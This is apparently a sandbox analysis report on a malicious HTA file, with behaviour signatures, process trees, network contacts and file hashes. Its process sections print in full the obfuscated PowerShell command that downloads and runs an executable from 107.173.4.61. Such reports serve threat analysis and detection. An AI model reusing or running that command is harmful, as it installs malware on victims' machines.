Analysis Overview
SHA256
5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546
Threat Level: Likely malicious
The file 5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546.hta was found to be: Likely malicious.
Malicious Activity Summary
Evasion via Device Credential Deployment
Blocklisted process makes network request
Checks computer location settings
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Modifies Internet Explorer settings
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-14 02:28
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-14 02:28
Reported
2024-11-14 02:31
Platform
win7-20240903-en
Max time kernel
120s
Max time network
122s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546.hta"
C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE
"C:\Windows\SysTEM32\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE" "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a+'UTF8.getsTring([SYsTEm.CoNVErT]'+[ChAr]0x3a+[CHAR]58+'FroMBASe64strINg('+[ChaR]0X22+'JEMzV3NmSEMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYmVyZEVGSU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1ByeSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJcWloU2dPcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3l3UmhuUUdmS1IsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV2JKYUdNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiV25XVCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkQzNXc2ZIQzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzMuNC42MS8zNDUvd2xhbmV4dHMuZXhlIiwiJEVOdjpBUFBEQVRBXHdsYW5leHQuZXhlIiwwLDApO3NUQVJULXNsZUVwKDMpO3NUYXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSI='+[chaR]0X22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\izdu6utb.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAD22.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCAD21.tmp"
Network
| Country | Destination | Domain | Proto |
| US | 107.173.4.61:80 | tcp | |
| US | 107.173.4.61:80 | tcp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 0e0ce348f6ba941e618f1f455f29bea6 |
| SHA1 | 9ba4c3c056c3e0c5997fd8eda7812d1b1a353324 |
| SHA256 | 06242b3b804c45f717ffc02587d79a5cb14a98cb8baa625601f31fdaab3c1b35 |
| SHA512 | 2af0e2e84d46fda69b4fb3bafebff13473f15199c943f1d93f9c08f901af18cb03f44e0f1f7b4f333d465e6e000b5fc4134d5a29e58fe671be5ad9451f4c27b0 |
\??\c:\Users\Admin\AppData\Local\Temp\izdu6utb.cmdline
| MD5 | 39436a3ec2a28845767ca16383e33bd1 |
| SHA1 | 5003dd9e8157d5f18e1610fcfb89da7f0e5b6b27 |
| SHA256 | 805a6e724b1d941e225b313dfaec1a58cf13ede9db57896dc4acfefca1731992 |
| SHA512 | eff698496ff9504ddff80e7d87415ae24cf3d3888165f5bf01aa0390285db7f84450dd55a833d0ae04b3d686b04578eb340cd23da5e3931d297ddda775be7097 |
\??\c:\Users\Admin\AppData\Local\Temp\izdu6utb.0.cs
| MD5 | 4af98cbe7b888e1e92e1aa8a35732223 |
| SHA1 | 75d54c91355c97fc9b1c3453efea5dccd817ed42 |
| SHA256 | 596b94a3cb934e9261ddf50733d26c0147c5cb57e1215cabed32fee719782f34 |
| SHA512 | 1127001fd6eb53db939188df14cdd466f44103d8386e51ffaeaaa56569e137367388097c37422fbe332f6b7ced9f4959058f1235f106efcc03e492e009705ff3 |
\??\c:\Users\Admin\AppData\Local\Temp\CSCAD21.tmp
| MD5 | a39953edc790fd3c055982264d45ebd9 |
| SHA1 | 030b6c5c9f542e7a2c11e31e6f6cd192fe625d28 |
| SHA256 | 73e60fa13a32189fc6acb4f43438c43bea75ab6c954610c83a0e03adb8f5498b |
| SHA512 | 21f55a0a46f8326aaba23334a6693dd0bea8547156fdab2b350958d670d00b47ab8a834f1beef1aece6b4eab761032efab633ded776481f038cb8cde29f9192d |
C:\Users\Admin\AppData\Local\Temp\RESAD22.tmp
| MD5 | 78ba4ba9e5cd4d1450123b290bb33f7b |
| SHA1 | a345efa2b3a9a661451bdcd73fa957216475a0d9 |
| SHA256 | a95e272886f38db936882deb9994674cc2a43a07d8a80bb92012fa916e36fd77 |
| SHA512 | 5741f1538d57a7399f053e387974fcbbfe4ce2f2854659dd9164cc610f07791678233c304751bb7bc3ffa46b1e4d607469e5943d837ddcac2a9b2f50dbf659e0 |
C:\Users\Admin\AppData\Local\Temp\izdu6utb.dll
| MD5 | 3218f868f336ca301438aeb48e571988 |
| SHA1 | 55c770ae3601d5c090fef1d74f3bc8fade78d343 |
| SHA256 | 227bcaafdd1ee0187da1546b91d8fcfbd30ec783757c5121d98c2455e0001fcc |
| SHA512 | 00155c6ba172374c16ca5d05b3e9b082c91f3a8f264bcef8b90c21f20a837caf77a545de4cd3605d723f8a647b901b0959818ce846eb4f64d587bce326b37d0c |
C:\Users\Admin\AppData\Local\Temp\izdu6utb.pdb
| MD5 | 943f5fe78cba3be93ead28a8da5ba683 |
| SHA1 | a3cf7fe11d10fee595d7ebf1f5648ee18db07c7b |
| SHA256 | b95ff72fb9f74ee921d909d6152b9b3cdce12b4d4b460c90af4ca7b644dbbaa9 |
| SHA512 | fc907e54b6c4ce0a25219fc29e6e3f8ce3c2a1ef119d646762523f591b1203a411ea2de46d9f00827169fe7a09fad176618831a9dc04fc8546fccdef84935a7f |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-14 02:28
Reported
2024-11-14 02:31
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
151s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE
"C:\Windows\SysTEM32\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE" "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a+'UTF8.getsTring([SYsTEm.CoNVErT]'+[ChAr]0x3a+[CHAR]58+'FroMBASe64strINg('+[ChaR]0X22+'JEMzV3NmSEMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYmVyZEVGSU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1ByeSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJcWloU2dPcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3l3UmhuUUdmS1IsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV2JKYUdNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiV25XVCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkQzNXc2ZIQzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzMuNC42MS8zNDUvd2xhbmV4dHMuZXhlIiwiJEVOdjpBUFBEQVRBXHdsYW5leHQuZXhlIiwwLDApO3NUQVJULXNsZUVwKDMpO3NUYXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSI='+[chaR]0X22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0in0nkpt\0in0nkpt.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7B1B.tmp" "c:\Users\Admin\AppData\Local\Temp\0in0nkpt\CSCF7334F6B65CC4901955A98945D67A3C8.TMP"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 107.173.4.61:80 | tcp | |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.210.23.2.in-addr.arpa | udp |
Files
memory/3968-0-0x000000007174E000-0x000000007174F000-memory.dmp
memory/3968-1-0x0000000002E30000-0x0000000002E66000-memory.dmp
memory/3968-2-0x0000000071740000-0x0000000071EF0000-memory.dmp
memory/3968-3-0x00000000059C0000-0x0000000005FE8000-memory.dmp
memory/3968-4-0x0000000071740000-0x0000000071EF0000-memory.dmp
memory/3968-5-0x00000000057F0000-0x0000000005812000-memory.dmp
memory/3968-7-0x00000000060D0000-0x0000000006136000-memory.dmp
memory/3968-6-0x0000000006060000-0x00000000060C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vh05zdil.ilh.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3968-17-0x0000000006240000-0x0000000006594000-memory.dmp
memory/3968-18-0x0000000006730000-0x000000000674E000-memory.dmp
memory/3968-19-0x0000000006770000-0x00000000067BC000-memory.dmp
memory/5060-29-0x0000000007410000-0x0000000007442000-memory.dmp
memory/5060-30-0x000000006E000000-0x000000006E04C000-memory.dmp
memory/5060-40-0x0000000006790000-0x00000000067AE000-memory.dmp
memory/5060-41-0x00000000074D0000-0x0000000007573000-memory.dmp
memory/5060-42-0x0000000007C00000-0x000000000827A000-memory.dmp
memory/5060-43-0x00000000074A0000-0x00000000074BA000-memory.dmp
memory/5060-44-0x00000000075C0000-0x00000000075CA000-memory.dmp
memory/5060-45-0x00000000077F0000-0x0000000007886000-memory.dmp
memory/5060-46-0x0000000007760000-0x0000000007771000-memory.dmp
memory/5060-47-0x0000000007790000-0x000000000779E000-memory.dmp
memory/5060-48-0x00000000077A0000-0x00000000077B4000-memory.dmp
memory/5060-49-0x00000000078B0000-0x00000000078CA000-memory.dmp
memory/5060-50-0x00000000077E0000-0x00000000077E8000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\0in0nkpt\0in0nkpt.cmdline
| MD5 | a1d1dd60bb7da6fdd01bbf8e8e41fe2c |
| SHA1 | a2b6edfa7d9348752d2df54bf146fe3e624f27ca |
| SHA256 | d2c4a82f465f4902debaab261e11cba21dcdf9a91dc746847189cdb410d60ca5 |
| SHA512 | 734860982e6bf1e06ce962ab8a87dd12ed40f52b7d49eeafbdfa57341abeb54d9af19726ea786ff089e8a528b2d8164bd02220edeba55c564dfea536e7383aae |
\??\c:\Users\Admin\AppData\Local\Temp\0in0nkpt\0in0nkpt.0.cs
| MD5 | 4af98cbe7b888e1e92e1aa8a35732223 |
| SHA1 | 75d54c91355c97fc9b1c3453efea5dccd817ed42 |
| SHA256 | 596b94a3cb934e9261ddf50733d26c0147c5cb57e1215cabed32fee719782f34 |
| SHA512 | 1127001fd6eb53db939188df14cdd466f44103d8386e51ffaeaaa56569e137367388097c37422fbe332f6b7ced9f4959058f1235f106efcc03e492e009705ff3 |
\??\c:\Users\Admin\AppData\Local\Temp\0in0nkpt\CSCF7334F6B65CC4901955A98945D67A3C8.TMP
| MD5 | 18a135d11fca8199ca0899ce38002751 |
| SHA1 | 68c5991902e3012bd690dec62c50e0aa14ee1c13 |
| SHA256 | 2b6a9838681ca7dd29134382a42b80839d9aeac11fcace801eb6812c11b60219 |
| SHA512 | 5c024b26b02b1cc805f16cf6e5e36fefe5e2c0b0ab6087c6f50525b136eca8b886ff72e580b5c808c50c2ad07966addbc155516ce6fbc4a473acbe02c57c36e9 |
C:\Users\Admin\AppData\Local\Temp\RES7B1B.tmp
| MD5 | 34f33a6ed897ead12abe8b25165f5bbf |
| SHA1 | d354205cc95d473e450e5f1a036642d627248612 |
| SHA256 | 95aa5022ef00277999fb8dfa4da7b75961cfd6e6ce7451c12cf060bd02b19ed2 |
| SHA512 | b76e6f5cb9c885f86c13529132bc1a7401879fdf38349aca66d2a4ca1aa67c72941292dfb7d6dadb45c628a297c7e09cf522fadec18fc24db6f1b0ea94482a23 |
C:\Users\Admin\AppData\Local\Temp\0in0nkpt\0in0nkpt.dll
| MD5 | 145fe68db1e3360a7d472644b62dd45c |
| SHA1 | 8774f564706e16d1b71da942b31ecfb2e6fa6ed4 |
| SHA256 | ed3254984a0b2ce127fa4fec1fadd3e40a04a320c185611d7279461019f7a951 |
| SHA512 | e4f818499d5fd503b801b5505ad72909facc24598fb731bda7b9cd5e4bc1bb3c78bf7e751e6359bbba23dc28bbda1a1e2236195b9721e36bd31513596d1506f7 |
memory/3968-65-0x0000000006CE0000-0x0000000006CE8000-memory.dmp
memory/3968-67-0x000000007174E000-0x000000007174F000-memory.dmp
memory/3968-68-0x0000000071740000-0x0000000071EF0000-memory.dmp
memory/3968-69-0x0000000071740000-0x0000000071EF0000-memory.dmp
memory/3968-70-0x0000000007AF0000-0x0000000007B12000-memory.dmp
memory/3968-71-0x0000000008CC0000-0x0000000009264000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 96b2f0a83736315afed33226cb021197 |
| SHA1 | 396373463b0f5f9627f5592eb89aafd56507aa20 |
| SHA256 | 9b44ef0b05e17a79c69ccb3b1940ad6b66eeb40e54a8854a0a9bf854c9220108 |
| SHA512 | 74db69ba9edc0fa69a5d6c468692fa24acaba3dd8f9099f32fa728714259f832068606d22adeb14976ab96be26215a1e9eb9551cf049f08894b4993f795444a6 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\POwersHeLl.ExE.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
memory/3968-75-0x0000000071740000-0x0000000071EF0000-memory.dmp